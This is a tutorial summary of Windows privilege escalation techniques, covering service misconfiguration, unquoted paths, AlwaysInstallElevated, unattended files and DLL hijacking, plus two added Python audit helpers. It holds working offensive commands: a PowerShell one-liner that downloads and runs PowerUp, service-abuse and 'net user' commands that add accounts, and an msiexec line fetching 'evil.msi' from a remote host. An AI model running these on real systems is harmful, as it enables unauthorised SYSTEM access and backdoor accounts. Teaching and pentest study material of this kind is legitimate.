
Title: Summary of Windows privilege escalation methods


Summary of Windows privilege escalation methods

1 Introduction

1.1 Basic commands for privilege escalation


# Query system information
systeminfo

# To view specific fields only:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

# Host name
hostname

# Environment variables
set

# View user information
net user

# View the PID of a service (Remote Desktop here)
tasklist /svc | find "TermService"
netstat -ano | find "3389"

# Check the OS name
wmic os get caption

# View installed patches
wmic qfe get Description,HotFixID,InstalledOn

# To look for specific patches:
wmic qfe get Description,HotFixID,InstalledOn | findstr /C:"KB4346084" /C:"KB4509094"

# View installed software
wmic product get name,version

Pay attention to the environment variables: some software sets its environment variables to other paths, and if the files under such a path are writable, replacing a file there can achieve privilege escalation.

1.2 Windows privilege levels

User: Normal user permissions, the most restricted permission level in the system. The default permissions assigned to this group do not allow members to modify operating system settings or other users' profiles.

Administrator: Administrator permissions. Windows mechanisms can be used to elevate from Administrator to System permissions in order to operate on the SAM file and similar resources.

System: System permissions, which can read sensitive files such as the SAM. Elevating from Administrator to System is usually required in order to dump password hashes.

TrustedInstaller: The highest permission level. Even System permissions cannot modify protected system files; only TrustedInstaller permissions can modify them.

1.3 Typical privilege levels of common webshells

The usual webshell permissions are as follows:

ASP, PHP - Anonymous permissions

ASPX - user permissions

JSP - usually system permissions

2 Kernel exploit privilege escalation

This method relies on vulnerabilities in the system itself that have been publicly disclosed but for which the corresponding patch has not been installed. Using the EXP for such a vulnerability together with its patch number, permissions are escalated.

Check:


systeminfo

wmic qfe get Caption, Description, HotFixID, InstalledOn

# msf

post/windows/gather/enum_patches

Windows-Exploit-Suggester

The following pages help with finding an applicable exploit:

https://github.com/SecWiki/windows-kernel-exploits

https://wiki.0-sec.org/#/index

https://github.com/neargle/win-powerup-exp-index

http://blog.neargle.com/win-powerup-exp-index/

https://detect.secwx.com


3 Privilege escalation via misconfiguration

3.1 Incorrect system service permission configuration

Windows system services are loaded when the operating system starts, and each service's executable file is called. Therefore, if a low-privileged user has write permission to the executable that a service calls, the file can be replaced with an arbitrary executable, which then runs with System permissions when the service starts. In general, Windows services execute with System permissions, so their folders, files and registry key values are protected by strict access control, but in some cases certain services are still not effectively protected.

3.1.1 accesschk

Download address: https://download.sysinternals.com/files/SysinternalsSuite.zip

Use the accesschk.exe tool to view services that can be modified by the current user:

accesschk.exe -uwcqv "XXX" * /accepteula > 1.txt   (XXX is the current username)

If SERVICE_ALL_ACCESS appears, the current user has permission to modify the service.

View the service's startup configuration:

sc qc VMTools


Then modify the service's executable path to the command we want to execute:

# Note that there must be a space after "=" here
sc config VMTools binPath= "net user test1 abc123! /add"

# Check whether the service's execution path was modified successfully
sc qc VMTools

Restart the service


sc stop VMTools

sc start VMTools

Note that starting the service reports an error: when a service starts on Windows it must communicate with the Service Control Manager, and if it does not, the SCM treats this as a failure and terminates the process. But our command has already run with SYSTEM permissions and the user has been added successfully.

Info: It is also possible to use the system's built-in icacls.

Confirm write permissions: icacls "C:\Program Files\program folder"


"M" means Modify, "F" means Full control

"CI" (container inherit) means that child folders inherit the access control entry

"OI" (object inherit) means that child files inherit the access control entry

Commonly used commands:


icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
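As an added example (not from the original post), the following Python parses icacls output and applies the meaning of M/F/CI/OI given above to flag directories that Everyone, BUILTIN\Users or Authenticated Users can modify, which is what the findstr chains search for. The icacls output and the folder names are constructed for the example.

```python
import re

# Constructed icacls output (not captured from a real host): three vendor
# folders under C:\Program Files plus the usual summary line.
SAMPLE_ICACLS = r"""C:\Program Files\Some Vendor NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                             BUILTIN\Administrators:(OI)(CI)(F)
                             BUILTIN\Users:(OI)(CI)(M)
C:\Program Files\Good Vendor NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                             BUILTIN\Users:(OI)(CI)(RX)
C:\Program Files\Other App Everyone:(OI)(CI)(F)
Successfully processed 3 files; Failed processing 0 files
"""

# Identities may contain one space ("NT AUTHORITY\SYSTEM"), so list those forms
# explicitly; otherwise an identity is a single token such as BUILTIN\Users.
IDENT = r"(?:NT AUTHORITY\\|NT SERVICE\\|APPLICATION PACKAGE AUTHORITY\\)\S+|CREATOR OWNER|\S+"
RIGHTS = r"(?P<rights>(?:\([A-Z,]+\))+)"
FIRST_RE = re.compile(r"^(?P<path>[A-Za-z]:\\.*?)\s+(?P<ident>" + IDENT + r"):" + RIGHTS + r"$")
ACE_RE = re.compile(r"^(?P<ident>" + IDENT + r"):" + RIGHTS + r"$")

LOW_PRIV = {"Everyone", r"BUILTIN\Users", r"NT AUTHORITY\Authenticated Users"}
WRITE_FLAGS = {"F", "M", "W"}   # full control, modify, write

def parse_icacls(text):
    """Return (path, identity, flags) for every ACE; continuation lines
    (indented, without a path) belong to the most recent path."""
    entries, path = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = FIRST_RE.match(line)
        if m:
            path = m.group("path")
        else:
            m = ACE_RE.match(line)
            if not m or path is None:
                continue                      # blank or summary line
        flags = [f for g in re.findall(r"\(([A-Z,]+)\)", m.group("rights")) for f in g.split(",")]
        entries.append((path, m.group("ident"), flags))
    return entries

def writable_by_low_priv(entries):
    """Flag ACEs that give low-privileged principals F/M/W, noting whether the
    right propagates to files (OI) and to subfolders (CI)."""
    hits = []
    for path, ident, flags in entries:
        granted = WRITE_FLAGS & set(flags)
        if ident in LOW_PRIV and granted:
            hits.append({"path": path, "identity": ident, "rights": sorted(granted),
                         "files_inherit": "OI" in flags, "subfolders_inherit": "CI" in flags})
    return hits
```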

3.1.2 PowerSploit


powershell.exe -exec bypass -nop -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks"

powershell.exe -exec bypass -Command "& {Import-Module D:/PowerUp.ps1; Invoke-AllChecks}" > 1.txt

List all possible services that may have problems:


ServiceName: the service that may be vulnerable

Path: the path of the service's executable

StartName: the account the service runs as

AbuseFunction: the command to abuse the service

Run the script according to the method given in AbuseFunction; here we take the VGAuthService service as an example.


Add an account named user with password 123456:

powershell.exe -exec bypass -Command "& {Import-Module C:/PowerUp.ps1; Invoke-ServiceAbuse -Name 'VGAuthService' -UserName user -Password 123456}"

3.1.3 metasploit


use exploit/windows/local/service_permissions

set AGGRESSIVE true

set session 1

exploit

3.2 Trusted service path privilege escalation

The trusted service path vulnerability exploits the way Windows resolves file paths. If the path of the executable a service calls is not quoted correctly, and an attacker has write permission somewhere along that path, the attacker can upload a file that hijacks the path resolution.

For example, the file path found when a Windows system starts a service is C:\Program Files\Some Folder\Services.exe.

For each space in the path, Windows first tries to execute a program whose name matches the part before the space, so Windows looks for the startup program in the following order:

C:\Program.exe

C:\Program Files\Some.exe

C:\Program Files\Some Folder\Services.exe

If we have write permission to C:\ or to C:\Program Files, we can upload a Program.exe or Some.exe to the corresponding directory. When the service restarts, the malicious program we uploaded is executed with System permissions.

Conditions:

The service path is not using double quotes

The service path contains spaces

We have write permissions for a certain intermediate folder

3.2.1 Check

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
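To show the path resolution described in 3.2 together with the filter applied by the check command, here is an added Python audit (not from the original post) that reproduces the wmic | findstr logic over a constructed list of services and lists the alternative paths Windows would try for each unquoted path; the service names and paths are made up for the example.

```python
import re

# Constructed (name, PathName, StartMode) records standing in for
# "wmic service get name,pathname,startmode" output; not real services.
SAMPLE_SERVICES = [
    ("AgentSvc",   r"C:\Program Files\Some Vendor\Agent Service\agent.exe -run", "Auto"),
    ("GoodSvc",    r'"C:\Program Files\Good Vendor\good.exe" -svc',              "Auto"),
    ("Spooler",    r"C:\Windows\System32\spoolsv.exe",                           "Auto"),
    ("NoSpaceSvc", r"C:\Tools\svc.exe",                                          "Auto"),
    ("ManualSvc",  r"C:\Program Files\Some Folder\Services.exe",                 "Manual"),
]

def search_candidates(pathname):
    """Return the executables Windows tries, in order, for a service path.
    A quoted path yields exactly one candidate; an unquoted path with spaces
    yields one candidate per space (C:\\Program.exe, C:\\Program Files\\Some.exe, ...)."""
    p = pathname.strip()
    if p.startswith('"'):
        return [p.split('"')[1]]
    m = re.match(r'(?i)^(.*?\.exe)\b', p)   # drop trailing arguments
    exe = m.group(1) if m else p
    parts = exe.split(" ")
    cands = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    return cands + [exe]

def audit_services(records):
    """Apply the same filter as the wmic | findstr chain: auto-start, outside
    C:\\Windows\\, unquoted. Returns (name, paths that must not be creatable
    by low-privileged users) for each affected service."""
    findings = []
    for name, pathname, startmode in records:
        if startmode.lower() != "auto" or pathname.lower().startswith("c:\\windows\\"):
            continue
        cands = search_candidates(pathname)
        if len(cands) > 1:            # quoted or space-free paths yield one entry
            findings.append((name, cands[:-1]))
    return findings

if __name__ == "__main__":
    for name, paths in audit_services(SAMPLE_SERVICES):
        print(f"{name}: verify these cannot be created by non-admin users: {paths}")
```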

3.2.2 Exploitation

Next check whether you have write permissions to the target folder, use the built-in Windows tool icacls to check the paths at each level:

icacls "C:"
icacls "C:\Program Files"
icacls "C:\Program Files\VMware"

Check whether each directory level is writable. Here the C:\Program Files\VMware directory turns out to be writable; placing a Trojan in this directory means that once it is launched, it runs with high permissions.

3.2.3 Module in msf

exploit/windows/local/trusted_service_path module

3.3 Scheduled task privilege escalation

If an attacker has write permission to the directory in which a scheduled task runs with high permissions, a malicious program can be used to overwrite the original program, so that the malicious program is run with high permissions the next time the scheduled task executes.

Get-ScheduledTask | Select * | ? {($_.TaskPath -notlike "\Microsoft\Windows\*") -And ($_.Principal.UserId -notlike "*$env:UserName*")} | Format-Table -Property State, Actions, Date, TaskPath, TaskName, @{Name="User";Expression={$_.Principal.userID}}

Check the permission configuration of a directory

accesschk64.exe -dqv "/path/to/dir"


4 AlwaysInstallElevated privilege escalation

The registry key AlwaysInstallElevated is a policy setting with which Windows allows low-privileged users to run MSI installer files with System permissions. If this policy is enabled, any user can run a malicious MSI file with NT AUTHORITY\SYSTEM permissions.

4.1 Query

Query:


reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If the AlwaysInstallElevated policy is not enabled, the result is: "The specified registry key or value cannot be found".

4.2 Enable


reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

4.3 Execute an MSI file

Local execution: msiexec /q /i C:\msi.msi

The /i parameter indicates an installation operation

The /q parameter hides the installation interface

In addition, msiexec can also load the Trojan from a URL without writing a file to disk. Of course, this cannot be used with low permissions, because an MSI file used remotely requires a trusted certificate. With AlwaysInstallElevated privileges: msiexec /q /i http://ip/evil.msi

4.4 Exploitation

4.4.1 PowerUp script

https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

Test whether AlwaysInstallElevated is enabled:

Import-Module .\PowerUp.ps1

Get-RegistryAlwaysInstallElevated

A return value of True means it is enabled.

4.4.2 Adding a user with MSI Wrapper

MSI Wrapper Download address: https://www.exemsi.com/download/

Set the payload to execute ProcessHacker:

Runtime requires elevated permissions:


Under MSI installation context, select Per User and Per Machine.

5 Unattended installation files

Some Windows unattended installation files contain users' passwords in plaintext or as base64-encoded ciphertext:

dir /s *sysprep.inf *sysprep.xml *unattend.xml *unattend.txt 2>nul

Common locations:

C:\sysprep.inf

C:\sysprep\sysprep.xml

C:\Windows\system32\sysprep.inf

C:\Windows\system32\sysprep\sysprep.xml

C:\Windows\Panther\Unattend\Unattended.xml

C:\Windows\Panther\Unattend\Unattend.xml

C:\Windows\System32\sysprep\unattend.xml

C:\Windows\System32\Sysprep\Panther\unattend.xml

6 DLL hijacking privilege escalation

6.1 Related concepts

6.1.1 Introduction to DLLs

What is hijacking? Performing a diverting operation before a normal event takes place.

Dynamic-link library (DLL): in Windows, many applications are not a single complete executable file; they are divided into relatively independent dynamic-link libraries, i.e. DLL files, placed on the system. When a program is executed, the corresponding DLL files are called. An application can use multiple DLL files, and a DLL file can be used by different applications; such a DLL file is called a shared DLL.

6.1.2 DLL loading order

Microsoft's DLL hijacking protection is divided into three stages:

Unprotected phase: Before Windows XP SP2

Protection phase: After Windows XP SP2, before Windows 7

Further protection phase: After Windows 7

Before Windows XP SP2:

The directory where the application corresponding to the process is located;

The current directory (SetCurrentDirectory) at the time the DLL is loaded;

The system directory, i.e. the SYSTEM32 directory (GetSystemDirectory);

The 16-bit system directory, i.e. the SYSTEM directory;

The Windows directory, C:\Windows (obtained through GetWindowsDirectory);

Each directory in the PATH environment variable;

After Windows XP SP2:

After Windows XP SP2

In order to prevent the occurrence of DLL hijacking vulnerabilities, Microsoft added a SafeDllSearchMode registry attribute after XP SP2. The registry path is as follows:


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDllSearchMode

When the value of SafeDllSearchMode is set to 1, that is, when safe DLL search mode is enabled, the directory order for searching DLLs is as follows:

The directory where the application is located;

The system directory, i.e. the SYSTEM32 directory;

The 16-bit system directory, i.e. the SYSTEM directory. This entry exists only for backward compatibility and can be ignored;

The Windows directory, usually C:\Windows;

The current directory at the time the DLL is loaded;

All directories in the PATH environment variable. Note that the application path specified by the App Paths registry key is not included here.

After Windows 7:

In order to further prevent system DLLs from being hijacked, Microsoft wrote a number of easily hijacked system DLLs into a registry key; any DLL listed under this key is prohibited from being loaded from the directory of the EXE itself and can only be loaded from the system directory, namely SYSTEM32. The registry path is as follows:


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs

The Windows operating system determines the path of the DLL an application calls through the "DLL search directory order" and the "KnownDLLs registry key" mechanisms. After that, the application loads the DLL into its own memory space and executes the corresponding functions.

6.1.3 Analyzing the DLL loading process - Process Monitor

Process Monitor is an advanced monitoring tool for Windows that displays real-time file system, registry, and process/thread activity.

https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-utilities

Process Monitor's Filter is used to filter the events of the application under analysis.